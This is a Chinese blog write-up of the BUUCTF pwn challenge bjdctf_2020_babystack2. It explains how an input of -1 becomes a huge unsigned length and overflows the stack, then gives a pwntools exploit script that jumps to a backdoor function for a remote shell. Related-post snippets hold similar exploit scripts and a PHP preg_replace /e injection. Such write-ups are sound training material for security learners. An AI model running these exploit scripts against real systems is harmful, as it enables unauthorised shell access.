BUUCTF-bjdctf_2020_babystack2-WP

已于 2022-10-18 00:09:25 修改
阅读量251 收藏
点赞数
分类专栏: BUUCTF 文章标签: 安全 linux
于 2022-10-18 00:06:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/arraylocalhost/article/details/127379227
版权
本文探讨了一种栈溢出漏洞,通过分析read()函数的潜在溢出条件,发现当输入长度为-1时,由于类型转换会导致溢出。作者详细解释了如何利用这个漏洞,通过发送特定payload触发后门函数,并提供了利用脚本进行远程连接和互动。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x1 checksec

只有NX保护 

0x2 IDA

main

read()函数会存在溢出

跟进buf看偏移

只要nbytes>0x10即可溢出

但是前面if循环限制了nbytes的大小,所以这个方法不行

继续看,nbytes--------->unsigned int无符号整型 

遇到-1会变成unsigned int的最大值,栈溢出

有后门函数

再进行交互,即可编写脚本 

0x3 EXP

from pwn import *

r=remote("node4.buuoj.cn",26042)

backdoor_addr=0x400726

r.recvuntil('[+]Please input the length of your name:')
r.sendline('-1')

payload='a'*0x10+'b'*0x8
payload+=p64(backdoor_addr)
r.sendline(payload)

r.interactive()

BUUCTFbjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1695
BUUCTFbjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
buuctf-[BJDCTF2020]ZJCTF,不过如此
qq_42728977的博客
12-26 2505
[BJDCTF2020]ZJCTF,不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
bjdctf_2020_babystack2BUUCTF
qq_41696518的博客
08-31 874
bjdctf_2020_babystack2BUUCTF
[BUUCTF]PWN——bjdctf_2020_babystack2
mcmuyanga的博客
11-03 752
bjdctf_2020_babystack2 附件 步骤: 例行检查,64位程序,开启了nx保护 尝试运行一下程序,看看情况 64位ida载入,习惯性的先检索程序里的字符串,发现了bin/sh,双击跟进,找到了程序里的后门函数,backdoor=0x400726 从main函数开始看程序 我们读入数据的大小由我们输入的参数nbytes控制,但是nbytes又不能大于10,这边注意到了nbytes参数的类型–>size_t 百度百科里对这个类型的解释是 大概就是一个无符号整型,注意重点是无符
BUUCTF|PWN-bjdctf_2020_babystack2-WP
l2645470582_的博客
11-09 477
1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串,我们看到关键字符串"/bin/sh" 然后我们找到后门函数的地址:backdoor_addr = 0x0400726 3.我们看看main函数里面的内容 我们看到第一个nbytes是有符号数,第二个nbytes就变成了无符号数 我们判断这是一个整数溢出 所以 -1 = 4294967295 4.EXP #encoding = utf-8 fr...
BUUCTF------[BJDCTF2020]BJD hamburger competition
qq_64558075的博客
01-30 3218
1.拿到文件 运行 这是我第一次做Unity3D的逆向题,不知道从哪里下手,首先先看看大佬的wp 大佬的wp说这个文件是Unity3D,是由C#进行开发的,那么就要使用dnSpy进行分析,dnSpy下载地址:https://github.com/dnSpy/dnSpy/releases 下载完后,将C:\Users\86159\Desktop\attachment (22)\BJD hamburger competition_Data\Managed中的Assembly-CSh...
42200wp_a-new-paradigm-shift_0212_zh-cn_fnl_lores.pdf
最新发布
03-17
42200wp_a-new-paradigm-shift_0212_zh-cn_fnl_lores.pdf
BUUCTF [BJDCTF2020]Easy MD51 解析WP
m0_73615178的博客
01-07 1663
首先,看题有个文本框和一个提交按钮,那么大致注入点从注入框下手,随意输入一个值,通过抓包和分析网址得出,传参方式为GET方式,后端判断语句为sql语句“select * from 'admin' where password=md5($pass,true)”,其中利用散列函数md5加密了password。MD5函数介绍, 语法:md5(string,raw),其中string要计算的字符串,raw(可选)规定十六进制或二进制输出格式true为原始16字符二进制格式,默认false32字符16进制格式。
28403wp_stealth-crimeware_0611_zh-cn_fnl_lores.pdf
03-17
28403wp_stealth-crimeware_0611_zh-cn_fnl_lores.pdf
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 976
[buuctf]bjdctf_2020_babystack
BUUCTF bjdctf_2020_babystack
小白垃圾笔记2
04-30 425
有的,所以我们的利用思路就是将返回地址先覆盖为pop rdi;ret 的地址,将参数(/bin/sh)传入rdi。然后再将system的地址填充进去,这样pop rdi;执行ret的时候就会去执行system。那么pop rdi;ret 后边的内容就应该是/bin/sh的地址了。有system函数调用,并且存在/bin/sh。去找有没有pop rdi ret。小白做题笔记而已,不建议阅读。64为程序用rdi传参。read函数存在栈溢出。
BUUCTF(pwn)bjdctf_2020_babystack
半岛铁盒的博客
03-29 486
from pwn import * p = remote("node3.buuoj.cn",27955) sys = 0x04006E6 p.sendlineafter("[+]Please input the length of your name:\n",'200') payload = 'a' * (0x10 + 0x8) + p64(sys) p.sendlineafter("[+]What's u name?\n",payload) p.interactive() 有疑问的欢迎留言∑ ...
bjdctf_2020_babystackBUUCTF
qq_41696518的博客
08-26 1047
bjdctf_2020_babystack
[BUUCTF-pwn]——bjdctf_2020_babystack
Y_peak的博客
02-10 424
[BUUCTF-pwn]——bjdctf_2020_babystack 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中checksec一下 , 64位的我们要小心参数小于6位的函数. IDA中看看 看到这里不用我多说了吧, So easy !!! exploit from pwn import * p = remote("node3.buuoj.cn",25355) sys = 0x04006EA p.sendlinea
BUUCTF(pwn)bjdctf_2020_babystack2
半岛铁盒的博客
04-04 242
这是一道整形溢出的题目 from pwn import * p = remote("node3.buuoj.cn",28786) flag=0x400726 p.sendlineafter("[+]Please input the length of your name:\n",'-1') p.recv() payload='a'*(0x10+8)+p64(flag) p.sendline(payload) p.interactive() 有疑问的欢迎留言 ...
BUUCTF PWN bjdctf_2020_babystack
Rt1Text的博客
04-23 391
1.checksec+运行 64位/NX保护 2.64位IDA进行中 1.main函数 read()函数溢出 跟进buf,看看偏移 offset=0x10+8 但要注意一点: read(0, buf, (unsigned int)nbytes); 无符号整型,需要输入-1,进行整型溢出 接下来就是常规的操作 backdoor函数地址 3.直接上脚本 from pwn import* #p=process('./12babystack') p=remote...
[BUUCTF]PWN——bjdctf_2020_babystack
BangSen1的博客
03-29 367
例行检查,64位,开启NX保护 运行一下, 用IDA打开,检索字符串,看到了后门 跟进查看。 找到了地址,shelladdr=0x4006EA 查看主函数 接收函数长度由我们自己决定,由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.
BUUCTF pwn——bjdctf_2020_babystack
CNS-Enterprise BCC-1701-J
03-31 381
BUUCTF 做题练习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值